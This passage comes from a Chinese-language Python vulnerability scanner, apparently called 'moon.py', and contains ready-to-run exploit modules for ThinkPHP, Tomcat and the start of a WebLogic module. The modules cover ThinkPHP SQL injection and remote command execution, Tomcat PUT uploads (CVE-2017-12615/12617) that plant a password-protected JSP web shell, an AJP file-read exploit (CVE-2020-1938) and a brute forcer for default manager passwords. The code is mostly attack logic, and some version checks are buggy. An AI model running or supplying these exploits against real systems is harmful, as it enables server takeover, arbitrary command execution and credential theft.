启动后,访问http://your-ip/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来。 9 | ''' 10 | 11 | 12 | def attack(url): 13 | print('[+]开始检测 thinkphp5_inj_info !') 14 | URL1 = url + '/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1' 15 | try: 16 | re = requests.get(URL1, verify=False, timeout=10) 17 | except Exception: 18 | print('[-]访问漏洞页面失败,未发现该漏洞!') 19 | print('\n') 20 | else: 21 | if re.status_code == 500 and 'SQLSTATE' in re.text: 22 | print('[+]存在风险页面,开始检测:', URL1) 23 | try: 24 | # print(re.text) 25 | soup=BeautifulSoup(re.content,"lxml") 26 | print('[+]获得账户数据如下,数据库连接数据请前往页面自行查找:') 27 | print(soup.find_all('h1')[0].get_text()) 28 | print('[+]漏洞检测结束,存在 thinkphp5_inj_info !') 29 | print('\n') 30 | except Exception: 31 | print('[-]获取数据出错!请自行访问页面判断.') 32 | print('\n') 33 | else: 34 | print('[-]访问漏洞页面失败,未发现该漏洞:', URL1, re.status_code) 35 | print('\n') 36 | 37 | 38 | if __name__ == "__main__": 39 | attack() 40 | -------------------------------------------------------------------------------- /thinkphp/thinkphp5_x_rce.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | from bs4 import BeautifulSoup 4 | 5 | ''' 6 | moon.py -u thinkphp http://xxxx.xxxx.xxxx.xxxx:xx 7 | ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 8 | 直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo: 9 | ''' 10 | 11 | 12 | def attack(url): 13 | print('[+]开始检测 thinkphp5.x_rce !') 14 | URL1 = url + r'/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1' 15 | try: 16 | re = requests.get(URL1, verify=False, timeout=10) 17 | except Exception: 18 | print('[-]访问漏洞页面失败,未发现该漏洞!') 19 | print('\n') 20 | else: 21 | if re.status_code == 500 and 'PHP' in re.text and 'System ' in re.text: 22 | print('[+]phpinfo成功执行:', URL1) 23 | try: 24 | soup=BeautifulSoup(re.content,"lxml") 25 | print('[+]获取到的php版本如下:') 26 | print(soup.find_all('h1')[0].get_text()) 27 | print('[+]漏洞检测结束,存在 thinkphp5.x_rce !') 28 | print('\n') 29 | except Exception: 30 | print('[-]获取数据出错!请自行访问页面判断.') 31 | print('\n') 32 | else: 33 | print('[-]访问漏洞页面失败,未发现该漏洞:', URL1, re.status_code) 34 | print('\n') 35 | 36 | 37 | if __name__ == "__main__": 38 | attack() 39 | -------------------------------------------------------------------------------- /thinkphp/thinkphp_before5_0_23_rce.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | from bs4 import BeautifulSoup 4 | 5 | ''' 6 | moon.py -u thinkphp http://xxxx.xxxx.xxxx.xxxx:xx 7 | ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 8 | 9 | POST /index.php?s=captcha HTTP/1.1 10 | Host: localhost 11 | Accept-Encoding: gzip, deflate 12 | Accept: */* 13 | Accept-Language: en 14 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 15 | Connection: close 16 | Content-Type: application/x-www-form-urlencoded 17 | Content-Length: 72 18 | 19 | _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id 20 | ''' 21 | 22 | 23 | def attack(url): 24 | print('[+]开始检测 thinkphp_before5.0.23_rce !') 25 | URL1 = url + r'/index.php?s=captcha' 26 | try: 27 | data = {'_method': '__construct', 'filter[]': 'system', 'method': 'get', 'server[REQUEST_METHOD]': 'ls'} 28 | re = requests.post(URL1, data=data, verify=False, timeout=10) 29 | except Exception: 30 | print('[-]访问漏洞页面失败,未发现该漏洞!') 31 | print('\n') 32 | else: 33 | if re.status_code == 200 and 'System Error' in re.text: 34 | print('[+]命令成功执行,获取到的目录如下:') 35 | try: 36 | print(re.text[:80]) 37 | print('[+]漏洞检测结束,存在 thinkphp_before5.0.23_rce !') 38 | print('\n') 39 | except Exception: 40 | print('[-]获取数据出错!请自行访问页面判断.') 41 | print('\n') 42 | else: 43 | print('[-]访问漏洞页面失败,未发现该漏洞', URL1, re.status_code) 44 | print('\n') 45 | 46 | 47 | if __name__ == "__main__": 48 | attack() 49 | -------------------------------------------------------------------------------- /tomcat/CVE_2017_12615.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import sys 3 | import requests 4 | import time 5 | 6 | ''' 7 | Usage: 8 | moon.py -u tomcat http://127.0.0.1:8080 9 | shell: http://127.0.0.1:8080/201712615.jsp?pwd=fff&cmd=whoami 10 | 影响范围:Linux/Windows Tomcat: 7.0.0 to 7.0.79 - 官网数据 11 | 成因:Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件 12 | 最好的解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true 13 | ''' 14 | 15 | def attack(URL): 16 | print('[+]开始检测-Tomcat-CVE-2017-12615。[+]') 17 | url = URL + '/T68t8YT86.jsp/' 18 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 19 | headers={"User-Agent":user_agent} 20 | data="""CVE-2017-12615 21 | <% 22 | if("fff".equals(request.getParameter("pwd"))){ 23 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); 24 | int a = -1; 25 | byte[] b = new byte[2048]; 26 | out.print("
");
27 |         while((a=in.read(b))!=-1){
28 |             out.println(new String(b));
29 |         }
30 |         out.print("
"); 31 | } 32 | %>""" 33 | try: 34 | requests.put(url, headers=headers, data=data) 35 | time.sleep(2) 36 | verify_response = requests.get(url[:-1], headers=headers) 37 | if verify_response.status_code == 200 and 'CVE-2017-12615' in verify_response.text: 38 | print('存在-Tomcat-CVE-2017-12615!!!') 39 | print('shell: ' + url[:-1]+'?pwd=fff&cmd=whoami') 40 | else : 41 | print('访问shell地址:'+verify_response.status_code) 42 | print("未发现-Tomcat-CVE-2017-12615。") 43 | except : 44 | print("未发现-Tomcat-CVE-2017-12615。") 45 | print('[+]检测结束-Tomcat-CVE-2017-12615。[+]') 46 | print('\n') 47 | 48 | if __name__ == "__main__": 49 | attack() -------------------------------------------------------------------------------- /tomcat/CVE_2017_12617.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import string 4 | from random import * 5 | import requests 6 | import urllib3 7 | 8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 9 | 10 | ''' 11 | Usage: 12 | moon.py -u tomcat http://127.0.0.1:8080 13 | shell: http://127.0.0.1:8080/201712615.jsp?pwd=fff&cmd=whoami 14 | ''' 15 | 16 | def gen_shell(): 17 | min_char = 4 18 | max_char = 12 19 | allchar = string.ascii_letters + string.digits 20 | shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char))) 21 | return shell_name + ".jsp" 22 | 23 | def construct_put(url, f): 24 | #print(url) 25 | evil = """CVE-2017-12617 26 | <% 27 | if("fff".equals(request.getParameter("pwd"))){ 28 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); 29 | int a = -1; 30 | byte[] b = new byte[2048]; 31 | out.print("
");
32 |         while((a=in.read(b))!=-1){
33 |             out.println(new String(b));
34 |         }
35 |         out.print("
"); 36 | } 37 | %>""" 38 | headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} 39 | req = requests.put(str(url) +'/'+ str(f) + "/", data=evil, headers=headers, verify=False) 40 | #print(req.status_code) 41 | if req.status_code == 201: 42 | #print("File Created ..") 43 | print('发现-Tomcat-CVE-2017-12617!!!') 44 | print('Shell地址:'+(str(url) +'/'+ str(f))+'?pwd=fff&cmd=whoami') 45 | else: 46 | print('未发现-Tomcat-CVE-2017-12617。') 47 | 48 | def attack(URL): 49 | print('[+]开始检测-Tomcat-CVE-2017-12617。[+]') 50 | shell_name = gen_shell() 51 | #print(shell_name) 52 | try: 53 | construct_put(URL, shell_name) 54 | except: 55 | print('shell上传错误。') 56 | print('[+]检测结束-Tomcat-CVE-2017-12617。[+]') 57 | print('\n') 58 | 59 | 60 | if __name__ == '__main__': 61 | attack() 62 | -------------------------------------------------------------------------------- /tomcat/CVE_2020_1938.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # CNVD-2020-10487 / CVE-2020-1938 3 | # https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py 核心代码出自此处 4 | from socket import * 5 | import struct 6 | from io import StringIO 7 | 8 | 9 | ''' 10 | Usage: 11 | moon.py -u tomcat http://127.0.0.1:8080 12 | 上面链接带不带端口无所谓,不带端口默认检测8009,带端口会检测链接中的端口和8009,不会检测两次8009 13 | 受影响版本 14 | 15 | Apache Tomcat 6 16 | Apache Tomcat 7 < 7.0.100 17 | Apache Tomcat 8 < 8.5.51 18 | Apache Tomcat 9 < 9.0.31 19 | 不受影响版本 20 | 1. Apache Tomcat = 7.0.100 21 | 2. Apache Tomcat = 8.5.51 22 | 3. Apache Tomcat = 9.0.31 23 | ''' 24 | 25 | 26 | def pack_string(s): 27 | if s is None: 28 | return struct.pack(">h", -1) 29 | l = len(s) 30 | return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0) 31 | 32 | 33 | def unpack(stream, fmt): 34 | size = struct.calcsize(fmt) 35 | buf = stream.read(size) 36 | return struct.unpack(fmt, buf) 37 | 38 | 39 | def unpack_string(stream): 40 | size, = unpack(stream, ">h") 41 | if size == -1: # null string 42 | return None 43 | res, = unpack(stream, "%ds" % size) 44 | stream.read(1) # \0 45 | return res 46 | 47 | 48 | class NotFoundException(Exception): 49 | pass 50 | 51 | 52 | class AjpBodyRequest(object): 53 | # server == web server, container == servlet 54 | SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) 55 | MAX_REQUEST_LENGTH = 8186 56 | 57 | def __init__(self, data_stream, data_len, data_direction=None): 58 | self.data_stream = data_stream 59 | self.data_len = data_len 60 | self.data_direction = data_direction 61 | 62 | def serialize(self): 63 | data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH) 64 | if len(data) == 0: 65 | return struct.pack(">bbH", 0x12, 0x34, 0x00) 66 | else: 67 | res = struct.pack(">H", len(data)) 68 | res += data 69 | if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER: 70 | header = struct.pack(">bbH", 0x12, 0x34, len(res)) 71 | else: 72 | header = struct.pack(">bbH", 0x41, 0x42, len(res)) 73 | return header + res 74 | 75 | def send_and_receive(self, socket, stream): 76 | while True: 77 | data = self.serialize() 78 | socket.send(data) 79 | r = AjpResponse.receive(stream) 80 | while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS: 81 | r = AjpResponse.receive(stream) 82 | 83 | if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4: 84 | break 85 | 86 | 87 | class AjpForwardRequest(object): 88 | _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range( 89 | 28) 90 | REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 91 | 'TRACE': TRACE} 92 | # server == web server, container == servlet 93 | SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) 94 | COMMON_HEADERS = ["SC_REQ_ACCEPT", 95 | "SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", 96 | "SC_REQ_AUTHORIZATION", 97 | "SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", 98 | "SC_REQ_COOKIE2", 99 | "SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT" 100 | ] 101 | ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", 102 | "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"] 103 | 104 | def __init__(self, data_direction=None): 105 | self.prefix_code = 0x02 106 | self.method = None 107 | self.protocol = None 108 | self.req_uri = None 109 | self.remote_addr = None 110 | self.remote_host = None 111 | self.server_name = None 112 | self.server_port = None 113 | self.is_ssl = None 114 | self.num_headers = None 115 | self.request_headers = None 116 | self.attributes = None 117 | self.data_direction = data_direction 118 | 119 | def pack_headers(self): 120 | self.num_headers = len(self.request_headers) 121 | res = "" 122 | res = struct.pack(">h", self.num_headers) 123 | for h_name in self.request_headers: 124 | if h_name.startswith("SC_REQ"): 125 | code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1 126 | res += struct.pack("BB", 0xA0, code) 127 | else: 128 | res += pack_string(h_name) 129 | 130 | res += pack_string(self.request_headers[h_name]) 131 | return res 132 | 133 | def pack_attributes(self): 134 | res = b"" 135 | for attr in self.attributes: 136 | a_name = attr['name'] 137 | code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1 138 | res += struct.pack("b", code) 139 | if a_name == "req_attribute": 140 | aa_name, a_value = attr['value'] 141 | res += pack_string(aa_name) 142 | res += pack_string(a_value) 143 | else: 144 | res += pack_string(attr['value']) 145 | res += struct.pack("B", 0xFF) 146 | return res 147 | 148 | def serialize(self): 149 | res = "" 150 | res = struct.pack("bb", self.prefix_code, self.method) 151 | res += pack_string(self.protocol) 152 | res += pack_string(self.req_uri) 153 | res += pack_string(self.remote_addr) 154 | res += pack_string(self.remote_host) 155 | res += pack_string(self.server_name) 156 | res += struct.pack(">h", self.server_port) 157 | res += struct.pack("?", self.is_ssl) 158 | res += self.pack_headers() 159 | res += self.pack_attributes() 160 | if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER: 161 | header = struct.pack(">bbh", 0x12, 0x34, len(res)) 162 | else: 163 | header = struct.pack(">bbh", 0x41, 0x42, len(res)) 164 | return header + res 165 | 166 | def parse(self, raw_packet): 167 | stream = StringIO(raw_packet) 168 | self.magic1, self.magic2, data_len = unpack(stream, "bbH") 169 | self.prefix_code, self.method = unpack(stream, "bb") 170 | self.protocol = unpack_string(stream) 171 | self.req_uri = unpack_string(stream) 172 | self.remote_addr = unpack_string(stream) 173 | self.remote_host = unpack_string(stream) 174 | self.server_name = unpack_string(stream) 175 | self.server_port = unpack(stream, ">h") 176 | self.is_ssl = unpack(stream, "?") 177 | self.num_headers, = unpack(stream, ">H") 178 | self.request_headers = {} 179 | for i in range(self.num_headers): 180 | code, = unpack(stream, ">H") 181 | if code > 0xA000: 182 | h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001] 183 | else: 184 | h_name = unpack(stream, "%ds" % code) 185 | stream.read(1) # \0 186 | h_value = unpack_string(stream) 187 | self.request_headers[h_name] = h_value 188 | 189 | def send_and_receive(self, socket, stream, save_cookies=False): 190 | res = [] 191 | i = socket.sendall(self.serialize()) 192 | if self.method == AjpForwardRequest.POST: 193 | return res 194 | 195 | r = AjpResponse.receive(stream) 196 | assert r.prefix_code == AjpResponse.SEND_HEADERS 197 | res.append(r) 198 | if save_cookies and 'Set-Cookie' in r.response_headers: 199 | self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie'] 200 | 201 | # read body chunks and end response packets 202 | while True: 203 | r = AjpResponse.receive(stream) 204 | res.append(r) 205 | if r.prefix_code == AjpResponse.END_RESPONSE: 206 | break 207 | elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK: 208 | continue 209 | else: 210 | raise NotImplementedError 211 | break 212 | 213 | return res 214 | 215 | 216 | class AjpResponse(object): 217 | _, _, _, SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7) 218 | COMMON_SEND_HEADERS = [ 219 | "Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified", 220 | "Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate" 221 | ] 222 | 223 | def parse(self, stream): 224 | # read headers 225 | self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb") 226 | 227 | if self.prefix_code == AjpResponse.SEND_HEADERS: 228 | self.parse_send_headers(stream) 229 | elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK: 230 | self.parse_send_body_chunk(stream) 231 | elif self.prefix_code == AjpResponse.END_RESPONSE: 232 | self.parse_end_response(stream) 233 | elif self.prefix_code == AjpResponse.GET_BODY_CHUNK: 234 | self.parse_get_body_chunk(stream) 235 | else: 236 | raise NotImplementedError 237 | 238 | def parse_send_headers(self, stream): 239 | self.http_status_code, = unpack(stream, ">H") 240 | self.http_status_msg = unpack_string(stream) 241 | self.num_headers, = unpack(stream, ">H") 242 | self.response_headers = {} 243 | for i in range(self.num_headers): 244 | code, = unpack(stream, ">H") 245 | if code <= 0xA000: # custom header 246 | h_name, = unpack(stream, "%ds" % code) 247 | stream.read(1) # \0 248 | h_value = unpack_string(stream) 249 | else: 250 | h_name = AjpResponse.COMMON_SEND_HEADERS[code - 0xA001] 251 | h_value = unpack_string(stream) 252 | self.response_headers[h_name] = h_value 253 | 254 | def parse_send_body_chunk(self, stream): 255 | self.data_length, = unpack(stream, ">H") 256 | self.data = stream.read(self.data_length + 1) 257 | 258 | def parse_end_response(self, stream): 259 | self.reuse, = unpack(stream, "b") 260 | 261 | def parse_get_body_chunk(self, stream): 262 | rlen, = unpack(stream, ">H") 263 | return rlen 264 | 265 | @staticmethod 266 | def receive(stream): 267 | r = AjpResponse() 268 | r.parse(stream) 269 | return r 270 | 271 | 272 | def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET): 273 | fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER) 274 | fr.method = method 275 | fr.protocol = "HTTP/1.1" 276 | fr.req_uri = req_uri 277 | fr.remote_addr = target_host 278 | fr.remote_host = None 279 | fr.server_name = target_host 280 | fr.server_port = 80 281 | fr.request_headers = { 282 | 'SC_REQ_ACCEPT': 'text/html', 283 | 'SC_REQ_CONNECTION': 'keep-alive', 284 | 'SC_REQ_CONTENT_LENGTH': '0', 285 | 'SC_REQ_HOST': target_host, 286 | 'SC_REQ_USER_AGENT': 'Mozilla', 287 | 'Accept-Encoding': 'gzip, deflate, sdch', 288 | 'Accept-Language': 'en-US,en;q=0.5', 289 | 'Upgrade-Insecure-Requests': '1', 290 | 'Cache-Control': 'max-age=0' 291 | } 292 | fr.is_ssl = False 293 | fr.attributes = [] 294 | return fr 295 | 296 | 297 | class Tomcat(object): 298 | def __init__(self, target_host, target_port): 299 | self.target_host = target_host 300 | self.target_port = target_port 301 | self.socket = socket(AF_INET, SOCK_STREAM) 302 | self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) 303 | self.socket.connect((target_host, target_port)) 304 | self.stream = self.socket.makefile("rb", buffering=0) 305 | 306 | def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]): 307 | self.req_uri = req_uri 308 | self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, 309 | method=AjpForwardRequest.REQUEST_METHODS.get(method)) 310 | print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) 311 | if user is not None and password is not None: 312 | self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ( 313 | "%s:%s" % (user, password)).encode('base64').replace('\n', '') 314 | for h in headers: 315 | self.forward_request.request_headers[h] = headers[h] 316 | for a in attributes: 317 | self.forward_request.attributes.append(a) 318 | responses = self.forward_request.send_and_receive(self.socket, self.stream) 319 | if len(responses) == 0: 320 | return None, None 321 | snd_hdrs_res = responses[0] 322 | data_res = responses[1:-1] 323 | if len(data_res) == 0: 324 | print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers) 325 | return snd_hdrs_res, data_res 326 | 327 | 328 | def attack(URL): 329 | print('[+]开始检测-Tomcat-CVE-2020-1938。[+]') 330 | #url中不带有端口 331 | if len(URL.split(':')) == 2: 332 | port = 8009 333 | print('port',port) 334 | print('ip',URL.split(':')[1][2:]) 335 | try: 336 | t = Tomcat(URL.split(':')[1][2:], port) 337 | _, data = t.perform_request('/asdf', attributes=[ 338 | {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']}, 339 | {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']}, 340 | {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']}, 341 | ]) 342 | print('----------------------------') 343 | print(type(data)) 344 | print(data[0].data.decode('UTF-8')) 345 | except Exception as e: 346 | print(e,'Some error!') 347 | 348 | #url中带有端口 349 | elif len(URL.split(':')) == 3: 350 | print('ip',URL.split(':')[1][2:]) 351 | print('port',URL.split(':')[2]) 352 | try: 353 | t = Tomcat(URL.split(':')[1][2:], int(URL.split(':')[2])) 354 | _, data = t.perform_request('/asdf', attributes=[ 355 | {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']}, 356 | {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']}, 357 | {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']}, 358 | ]) 359 | print('----------------------------') 360 | print(type(data)) 361 | print(data[0].data.decode('UTF-8')) 362 | except Exception as e: 363 | print(e,'Some error!') 364 | print('=================================') 365 | if int(URL.split(':')[2]) != 8009: 366 | print('ip', URL.split(':')[1][2:]) 367 | print('port', 8009) 368 | try: 369 | t = Tomcat(URL.split(':')[1][2:], 8009) 370 | _, data = t.perform_request('/asdf', attributes=[ 371 | {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']}, 372 | {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']}, 373 | {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']}, 374 | ]) 375 | print('----------------------------') 376 | print(type(data)) 377 | print(data[0].data.decode('UTF-8')) 378 | except Exception as e: 379 | print(e,'Some error!') 380 | else: 381 | pass 382 | else: 383 | print('url error') 384 | print('[+]检测结束-Tomcat-CVE-2020-1938。[+]') 385 | print('\n') 386 | 387 | 388 | if __name__ == '__main__': 389 | attack() 390 | -------------------------------------------------------------------------------- /tomcat/Main_tomcat.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import tomcat.CVE_2017_12615 3 | import tomcat.example_vulnerability 4 | import tomcat.CVE_2017_12617 5 | import tomcat.tomcat_weakpasswd 6 | import tomcat.CVE_2020_1938 7 | 8 | 9 | def exec(URL): 10 | tomcat.example_vulnerability.attack(URL) 11 | tomcat.CVE_2017_12615.attack(URL) 12 | tomcat.CVE_2017_12617.attack(URL) 13 | tomcat.tomcat_weakpasswd.attack(URL) 14 | tomcat.CVE_2020_1938.attack(URL) 15 | 16 | 17 | 18 | 19 | if __name__ == "__main__": 20 | exec() 21 | -------------------------------------------------------------------------------- /tomcat/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /tomcat/example_vulnerability.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | 4 | ''' 5 | Usage: 6 | moon.py -u tomcat http://127.0.0.1:8080 7 | 影响范围:Tomcat: 全版本 8 | session操纵漏洞:Apache Tomcat默认安装包含”/examples”目录,里面存着众多的样例, 9 | 其中session样例(/examples/servlets/servlet/SessionExample)允许用户对session进行操纵。 10 | 因为session是全局通用的,所以用户可以通过操纵session获取管理员权限。 11 | (不一定都是全局的,如果path只在examples下,那就无法利用)。 12 | 利用此漏洞需要知道相关后台登录后的session键值对,然后写入到session中,利用条件苛刻。 13 | https://cloud.tencent.com/info/2e03f26090fe592b6c7aa933dd6c0f94.html 14 | 解决办法:安装完tomcat后,删除$CATALINA_HOME/webapps下默认的所有目录文件* rm -rf /srv/apache-tomcat/webapps/* 15 | ''' 16 | 17 | def attack(URL): 18 | urls = ( 19 | '/examples/servlets/servlet/SessionExample', #200 20 | '/examples/', #304 21 | '/docs/', #304 22 | '/docs/BUILDING.txt', 23 | '/docs/RUNNING.txt', 24 | '/manager/html', # 401 25 | '/host-manager/html', #401 26 | '/icons/', 27 | '/manual/', 28 | '/examples/jsp/snp/snoop.jsp', 29 | '/lib/catalina.jar', 30 | '/conf/tomcat-users.xsd', 31 | '/bin/catalina-tasks.xml' 32 | ) 33 | 34 | print('[+]开始检测-Tomcat-example_vulnerability。[+]') 35 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 36 | headers={"User-Agent":user_agent} 37 | for url in urls: 38 | url = URL + url 39 | try: 40 | verify_response = requests.get(url, headers=headers) 41 | 42 | if verify_response.status_code == 200 or 304 or 401: 43 | try: 44 | print('页面返回状态码:'+str(verify_response.status_code)+' '+'页面返回大小为:'+str(len(verify_response.text))+' '+url) # 因为部分网站设置了统一的404页面,造成误报,因此添加返回长度来进行辅助判断 45 | except Exception: 46 | pass 47 | else: 48 | continue 49 | except Exception: 50 | print("Someerror!") 51 | print('[+]检测结束-Tomcat-example_vulnerability。[+]') 52 | print('\n') 53 | 54 | if __name__ == "__main__": 55 | attack() 56 | -------------------------------------------------------------------------------- /tomcat/tomcat_weakpasswd.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import base64 4 | import urllib3 5 | 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | ''' 8 | Usage: 9 | moon.py -u tomcat http://127.0.0.1:8080 10 | 爆破tomcat用户名账户密码。 11 | ''' 12 | 13 | def attack(URL): 14 | print('[+]开始检测-Tomcat-weak_pawsswd漏洞。[+]') 15 | #设定用于爆破的账户密码 16 | accounts = ['admin', 'tomcat', 'role1', 'manager', 'both'] 17 | passwds = ['123456', '1234', '12345678', 'admin', 'tomcat'] 18 | for account in accounts: 19 | for passwd in passwds: 20 | txt = account+':'+passwd 21 | encodestr = base64.b64encode(txt.encode('utf-8'))#使用base64加密爆破字符串 22 | encodestr = str(encodestr, 'utf-8')#将 b'' 这类的东西去掉 23 | url = URL + '/manager/html' 24 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 25 | Authorization = f'Basic {encodestr}' 26 | headers = {"User-Agent": user_agent,"Authorization":Authorization} 27 | try: 28 | r = requests.get(url,headers=headers, verify=False) 29 | if r.status_code == 200 and 'Tomcat Web Application Manager' in r.text: 30 | print('[+]发现弱口令'+ txt) 31 | elif r.status_code == 401: 32 | print('账户密码错误:', txt) 33 | else: 34 | print('[-]爆破密码出错。') 35 | except: 36 | print('[-]访问管理页面出错') 37 | print('[+]检测结束-Tomcat-weak_pawsswd漏洞。[+]') 38 | print('\n') 39 | 40 | if __name__ == "__main__": 41 | attack() 42 | -------------------------------------------------------------------------------- /weblogic/CNVD_C_2019_48814.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import optparse 3 | import requests 4 | import base64 5 | 6 | ''' 7 | Usage: 8 | moon.py -u weblogic http://127.0.0.1:7001 9 | 这个脚本原始出处不知道哪位大神(py2),自己改了改(py3)。base64有个坑. bytes 和 str 转换python2和3有点区别。 10 | 本脚本可直接执行命令。 11 | 12 | CNVD-C-2019-48814 13 | 14 | 漏洞描述: 15 | WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。 16 | 17 | 影响范围: 18 | WebLogic 10.X 19 | WebLogic 12.1.3 20 | 21 | http://192.168.1.126:7001/_async 22 | 403存在,404不存在 23 | 24 | http://192.168.1.126:7001/_async/AsyncResponseService 25 | 200存在,404不存在 26 | 27 | 修复: 28 | 打补丁 29 | 1、删除该wls9_async_response.war包并重启webLogic: 30 | 该war包具体路径如下: 31 | WebLogic 10.3.*: 32 | Middleware/wlserver_10.3/server/lib/bea_wls9_async_response.war 33 | WebLogic 12.1.3: 34 | Middleware/Oracle_Home/oracle_common/modules/com.oracle.webservices.wls.bea-wls9-async-response_12.1.3.war 35 | 2、 通过访问策略控制禁止 /_async/* 路径的URL访问。 36 | 37 | # 参考: 38 | ttps://www.jianshu.com/p/c4982a845f55?utm_campaign=hugo&utm_medium=reader_share&utm_content=note&utm_source=weixin-timeline&from=timeline 39 | https://mp.weixin.qq.com/s/xJAP11xxGpR9CCVJ-SHeLw 40 | 